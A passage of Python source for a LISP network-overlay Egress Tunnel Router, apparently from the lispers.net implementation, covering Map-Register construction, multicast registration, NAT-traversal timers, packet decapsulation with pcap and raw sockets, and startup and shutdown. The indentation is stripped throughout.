dns_name = lisp.lisp_get_decent_dns_name(eid)
ms_list[dns_name] = []
#endfor
else:
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_list[ms.ms_name] = []
#endfor
#endif
#
# Create data structure instances to build Map-Regiser message.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
#
# Traverse the databas-mapping associative array.
#
for db in lisp.lisp_db_list:
if (decent):
ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
else:
ms_dns_name = db.use_ms_name
#endif
#
# Is db entry associated with a map-server name that is not
# configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
msl = ms_list[ms_dns_name]
if (msl == []):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
else:
msl = ms_list[ms_dns_name][-1]
#endif
#
# If dynamic-EIDs are discovered, add each of them to EID-records,
# unless, we are doing a trigger in which case a single dynamic-EID
# is built into an EID-record.
#
# Otherwise, add static EID-prefixes into EID-records, unless a single
# one is triggered.
#
eid_records = ""
if (db.dynamic_eid_configured()):
for dyn_eid in db.dynamic_eids.values():
eid = dyn_eid.dynamic_eid
if (eid_only == None or eid_only.is_exact_match(eid)):
records, count = lisp_build_map_register_records(quiet, db,
eid, db.group, ttl)
eid_records += records
msl[1] += count
#endif
#endfor
else:
if (eid_only == None):
eid_records, count = lisp_build_map_register_records(quiet, db,
db.eid, db.group, ttl)
msl[1] += count
#endif
#endif
#
# Add EID-records to correct map-server name set.
#
msl[0] += eid_records
if (msl[1] == 20 or len(msl[0]) > 1100):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
#endif
#endfor
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_dns_name = ms.dns_name if decent else ms.ms_name
if (ms_list.has_key(ms_dns_name) == False): continue
for msl in ms_list[ms_dns_name]:
#
# Build map-server specific fields.
#
map_register.record_count = msl[1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.proxy_reply_requested = ms.proxy_reply
map_register.merge_register_requested = ms.merge_registrations
map_register.map_notify_requested = ms.want_map_notify
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
if (ms.refresh_registrations):
map_register.map_register_refresh = refresh
#endif
if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
eid_records = msl[0]
packet = packet + eid_records + trailer
ms.map_registers_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
time.sleep(.001)
#endfor
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Exit loop if we are triggering a Map-Register to a single
# Map-Server.
#
if (ms_only != None and ms == ms_only): break
#endfor
return
#enddef
#
# lisp_etr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_etr_process_info_timer(ms):
global lisp_etr_info_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_socket, lisp_ephem_socket, lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, ms, lisp.LISP_CTRL_PORT)
#
# Build Info-Request for RTRs so we can open up NAT state so RTRs
# can encapsulate to us when ETR is behind NAT.
#
allow_private = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
if (rtr.is_private_address() and allow_private == False):
r = lisp.red(rtr.print_address_no_iid(), False)
lisp.lprint("Skip over RTR private address {}".format(r))
continue
#endif
lisp.lisp_build_info_requests(sockets, rtr, lisp.LISP_DATA_PORT)
#endfor
#
# Restart periodic timer. For some reason only this timer has to be
# canceled. Found on while testing NAT-traversal on rasp-pi in Jul 2015.
#
lisp_etr_info_timer.cancel()
lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
return
#enddef
#
# lisp_process_register_timer
#
# Time to send a periodic Map-Register.
#
def lisp_process_register_timer(lisp_sockets):
global lisp_register_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build and send Map-Register.
#
lisp_build_map_register(lisp_sockets, None, None, None, True)
#
# If we are are doing L2-overlays, then register as a join of the
# broadcast MAC address.
#
if (lisp.lisp_l2_overlay):
entry = [ None, "ffff-ffff-ffff", True ]
lisp_send_multicast_map_register(lisp_sockets, [entry])
#endif
#
# Restart periodic timer.
#
if (lisp_register_timer): lisp_register_timer.cancel()
lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
length = len(entries)
if (length == 0): return
afi = None
if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
if (afi == None):
lisp.lprint("lisp_send_multicast_map_register() invalid group address")
return
#endif
#
# Find all (*,G) entries in entries array and replace with (S,G) entries
# from lisp_group_mapping_list.
#
g_entries = []
for source, group, joinleave in entries:
if (source != None): continue
g_entries.append([group, joinleave])
#endfor
decent = lisp.lisp_decent_pull_xtr_configured()
ms_list = {}
entries = []
for group, joinleave in g_entries:
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None):
lisp.lprint("No group-mapping for {}, could be underlay group". \
format(group))
continue
#endif
lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))
iid = ms_gm.group_prefix.instance_id
ms_name = ms_gm.use_ms_name
rle = ms_gm.rle_address
#
# To obtain decent-index for a group address, just use group address
# and no source as part of hash. Because an ITR does not know if (*,G)
# or (S,G) is registered with the mapping system
#
key = ms_name
if (decent):
key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
ms_list[key] = ["", 0]
#endif
if (len(ms_gm.sources) == 0):
entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
continue
#endif
for s in ms_gm.sources:
ms_list[key] = ["", 0]
entries.append([s, group, iid, key, rle, joinleave])
#endfor
#endfor
length = len(entries)
if (length == 0): return
lisp.lprint("Build Map-Register for {} multicast entries".format(length))
#
# Build RLE node for RLOC-record encoding. If behind a NAT, we need to
# insert a global address as the RLE node address. We will do that in
# the entries for loop.
#
rle_node = lisp.lisp_rle_node()
rle_node.level = 128
translated_rloc = lisp.lisp_get_any_translated_rloc()
rle = lisp.lisp_rle("")
rle.rle_nodes.append(rle_node)
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count. The ms_list
# is already setup for when pull-based decent is used.
#
if (decent == False):
for ms in lisp.lisp_map_servers_list.values():
ms_list[ms.ms_name] = ["", 0]
#endfor
#endif
rloc_name = None
if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname
#
# Count number of RTRs reachable so we know allocation count.
#
rtr_count = 0
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rtr_count += 1
#endfor
#
# Run through multicast entry array.
#
eid_records = ""
for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
#
# Is db entry associated with a map-server name that is not configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = 1 + rtr_count
eid_record.authoritative = True
eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
eid_record.group = lisp.lisp_address(afi, group, 0, iid)
if (eid_record.group.is_mac_broadcast() and \
eid_record.eid.address == 0): eid_record.eid.mask_len = 0
decent_index = ""
ms_name = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid_record.group)
decent_index = lisp.bold(str(decent_index), False)
decent_index = "with decent-index {}".format(decent_index)
else:
decent_index = "for ms-name '{}'".format(ms_dns_name)
#endif
eid_str = lisp.green(eid_record.print_eid_tuple(), False)
lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
decent_index))
eid_records += eid_record.encode()
eid_record.print_record(" ", False)
ms_list[ms_dns_name][1] += 1
#
# Build our RLOC entry.
#
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc_name = rloc_name
#
# Decide on RLE address. Have NAT-traversal take precedent, otherwise
# use configured RLE in group-mapping. If one wasn't configured use
# lisp_myrlocs IPv4 address.
#
if (translated_rloc != None):
rle_node.address = translated_rloc
elif (rle_addr != None):
rle_node.address = rle_addr
else:
rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
#endif
rloc_record.rle = rle
rloc_record.local_bit = True
rloc_record.reach_bit = True
rloc_record.priority = 255
rloc_record.weight = 0
rloc_record.mpriority = 1
rloc_record.mweight = 100
eid_records += rloc_record.encode()
rloc_record.print_record(" ")
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
rloc_record.print_record(" RTR ")
#endfor
#
# Add EID-records to correct map-server name set.
#
ms_list[ms_dns_name][0] += eid_records
#endfor
#
# Build map-server independent fields.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.proxy_reply_requested = True
map_register.map_notify_requested = False
map_register.merge_register_requested = True
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
key = ms.dns_name if decent else ms.ms_name
#
# Get EID-records from correct map-server name set.
#
if (ms_list.has_key(key) == False): continue
#
# Build map-server specific fields.
#
map_register.record_count = ms_list[key][1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.alg_id = ms.key_id
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
packet = packet + eid_records + trailer
ms.map_registers_multicast_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Go build more EID-records.
#
time.sleep(.001)
#endfor
return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_etr_data_plane(parms, not_used, packet):
global lisp_ipc_listen_socket, lisp_send_sockets
device = parms[0]
lisp_raw_socket = parms[1]
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
if (lisp.lisp_is_macos() == False):
offset = 4 if device == "lo0" else 16
packet = packet[offset::]
#endif
#
# Check IGMP packet.
#
protocol = struct.unpack("B", packet[9])[0]
if (protocol == 2):
entries = lisp.lisp_process_igmp_packet(packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments. Do this only when
# not doing NAT-traversal. Otherwise, the kernel will do it when we
# receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
#
sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
packet = lisp.lisp_reassemble(packet)
if (packet == None): return
packet = lisp.lisp_packet(packet)
status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
if (status == None): return
#
# Print some useful header fields.
#
packet.print_packet("Receive", True)
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
source = packet.inner_source.print_address_no_iid()
packet.strip_outer_headers()
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
# (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet[36::]
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
source = packet.outer_source.print_address_no_iid()
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
f_or_b = lisp.bold("Forward", False)
#
# Process inner header (checksum and decrement ttl).
#
igmp = False
L2 = packet.inner_dest.is_mac()
if (L2):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
f_or_b = lisp.bold("Bridge", False)
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
if (igmp):
entries = lisp.lisp_process_igmp_packet(packet.packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet (through NAT)")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
#
# We are going to forward or bridge the decapsulated packet.
#
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# If we are decapsulating a MAC frame, then use the L2 socket where
# the MAC header is already in packet.
#
if (L2):
packet.bridge_l2_packet(packet.inner_dest, db)
return
#endif
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is a RTR encapsulated this packet that is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
global lisp_ipc_listen_socket, lisp_send_sockets
#
# Decode LISP header.
#
lisp_header = packet
packet = lisp.lisp_packet(packet[8::])
if (packet.lisp_header.decode(lisp_header) == False): return
#
# Store outer source RLOC address so if we are doing lisp-crypto across
# NAT-traversal, we can find the decryption key.
#
packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
lisp.LISP_IPV4_HOST_MASK_LEN, 0)
status = packet.decode(False, lisp_ipc_listen_socket,
lisp.lisp_decap_stats)
if (status == None): return
#
# Special case to log packets with no outer header but are considered
# decapsulated when coming through NATs. Since packets are sent from
# source port 4341, the kernel will strip outer header, so we don't have
# outer header context in lisp_packet().
#
if (lisp.lisp_flow_logging): packet.log_flow(False)
packet.print_packet("Kernel-decap", False)
lisp.dprint(packet.lisp_header.print_header(" "))
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
sport = packet.udp_sport
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on ephemeral socket. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
#endif
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format( \
lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out on raw socket.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping and send a Map-Register for each configured IPv6
# source for the IPv6 group-prefix found.
#
def lisp_register_ipv6_group_entries(group, joinleave):
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None): return
sg = []
for s in ms_gm.sources:
sg.append([s, group, joinleave])
#endfor
lisp_send_multicast_map_register(lisp_send_sockets, sg)
return
#enddef
#
# lisp_etr_join_leave_process
#
# Look at file-system to see if there is a join or leave to be done. This
# function will send joins in the form of building an IP/IGMPv2 packet to
# be passed to lisp_process_igmp_packet(). The groups that are joined are
# ones found as filenames in the current directory as "join-<group>". The
# IGMP Reports wil lbe sent to lisp_process_igmp_packet() every 30 seconds.
#
# For right now, if the group address is IPv6, send a Map-Register directly.
# We will get to MLD support later.
#
# This is used for testing and not meant for production deployment.
#
def lisp_etr_join_leave_process():
global lisp_send_sockets
lisp.lisp_set_exception()
swap = socket.htonl
ipigmp = [swap(0x46000020), swap(0x9fe60000), swap(0x0102d7cc),
swap(0x0acfc15a), swap(0xe00000fb), swap(0x94040000)]
packet = ""
for l in ipigmp: packet += struct.pack("I", l)
#
# Look for files in current directory for "join-<group>" and then send
# an IGMPv2 report to ourselves.
#
while (True):
groups = commands.getoutput("ls join-*").replace("join-", "")
groups = groups.split("\n")
for group in groups:
if (lisp.lisp_valid_address_format("address", group) == False):
continue
#endif
ipv6 = (group.find(":") != -1)
#
# Check if we are leaving group.
#
leavejoin = os.path.exists("leave-{}".format(group))
lisp.lprint("Internal {} group {}".format( \
"leaving" if leavejoin else "joining", group))
#
# Set IGMP message to Report or Leave. Then add group.
#
if (ipv6):
if (group.lower().find("ff02:") != -1):
lisp.lprint("Suppress registration for link-local groups")
continue
#endif
lisp_register_ipv6_group_entries(group, (leavejoin == False))
else:
send_packet = packet
if (leavejoin):
send_packet += struct.pack("I", swap(0x17000000))
else:
send_packet += struct.pack("I", swap(0x16000000))
#endif
octet = group.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
send_packet += struct.pack("I", swap(value))
sg = lisp.lisp_process_igmp_packet(send_packet)
if (type(sg) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, sg)
#endif
time.sleep(.100)
#endif
#endfor
time.sleep(10)
#endwhile
return
#enddef
#
# lisp_etr_process
#
# This thread is for receiving encapsulated LISP packets address to destination
# port 4341. As well as IGMP reports. The IGMP reports can be captured on
# Ubuntu and Fedora but not on MacOS. The former supports IGMPv3 and the
# latter supports IGMPv2 if we listen on "en0".
#
def lisp_etr_process():
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
#
# Find all multicast RLEs so we can receive packets on underlay multicast
# groups.
#
rles = lisp.lisp_get_all_multicast_rles()
#
# We need to listen on en0 when doing IGMP testing on MacOS.
#
device = "any"
# device = "en0" if lisp.lisp_is_macos() else "any"
# device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 1600, 0, 100)
pfilter = "(proto 2) or "
pfilter += "((dst host "
for addr in lisp.lisp_get_all_addresses() + rles:
pfilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(udp src port 4341) or "
pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
device))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
return
#enddef
#
# lisp_etr_startup
#
# Intialize this LISP ETR process. This function returns no values.
#
def lisp_etr_startup():
global lisp_ipc_listen_socket
global lisp_ephem_socket
global lisp_send_sockets
global lisp_raw_socket
global lisp_l2_socket
global lisp_mac_header
lisp.lisp_i_am("etr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ETR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
# of using pytun. See below.
#
# m = lisp.lisp_mymacs.keys()[0]
# mac = ""
# for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
# lisp_mac_header = mac + mac + "\x86\xdd"
# lisp.dprint("Built MAC header for L2 socket:",
# lisp.lisp_format_packet(lisp_mac_header))
#
# Used on for listening for Info-Replies for NAT-traversal support.
#
s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
lisp_ephem_socket = s
#
# Open network send socket and internal listen socket.
#
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
lisp_send_sockets[0] = lisp_ephem_socket
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open a L2 socket so when we decapsulate and have to route an IPv6
# packet, we have the kernel receive a MAC frame on the loopback interface.
# We do this because there is no IP_HDRINCL for IPv6 raw sockets.
#
# Disabling this code in favor of using a tuntap tun interface via the
# pytun module. See code right below.
#
# if ("PF_PACKET" in dir(socket)):
# interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
# "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
# if (interface != None):
# lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
# lisp_l2_socket.bind(("lo", 0x86dd))
# #endif
# #endif
#
# Setup tuntap tunnel interface so when we decap IPv6 packets, we can
# send to kernel to route them.
#
if (pytun != None):
lisp_mac_header = '\x00\x00\x86\xdd'
device = "lispers.net"
try:
lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
name=device)
os.system("ip link set dev {} up".format(device))
except:
lisp.lprint("Cannot create tuntap interface")
#endtry
#endif
#
# Start thread to listen on data socket.
#
threading.Thread(target=lisp_etr_process, args=[]).start()
#
# Test code to force IGMPv2 joins and leaves on an airplane. ;-)
#
threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():
global lisp_register_timer
global lisp_etr_info_timer
#
# Cancel periodic Map-Register and Info timer threads.
#
if (lisp_register_timer): lisp_register_timer.cancel()
if (lisp_etr_info_timer): lisp_etr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):
ipc = ipc.split("%")
eid_str = ipc[1]
interface = ipc[2]
if (interface == "None"): interface = None
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_address(eid_str)
#
# Do database-mapping lookup.
#
db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
if (db == None or db.dynamic_eid_configured() == False):
lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
format(lisp.green(eid_str, False)))
return
#endif
#
# Do logic checks. That is do not remove an entry if it is not there and
# don't try to add an entry if it is already cached.
#
dyn_eid = None
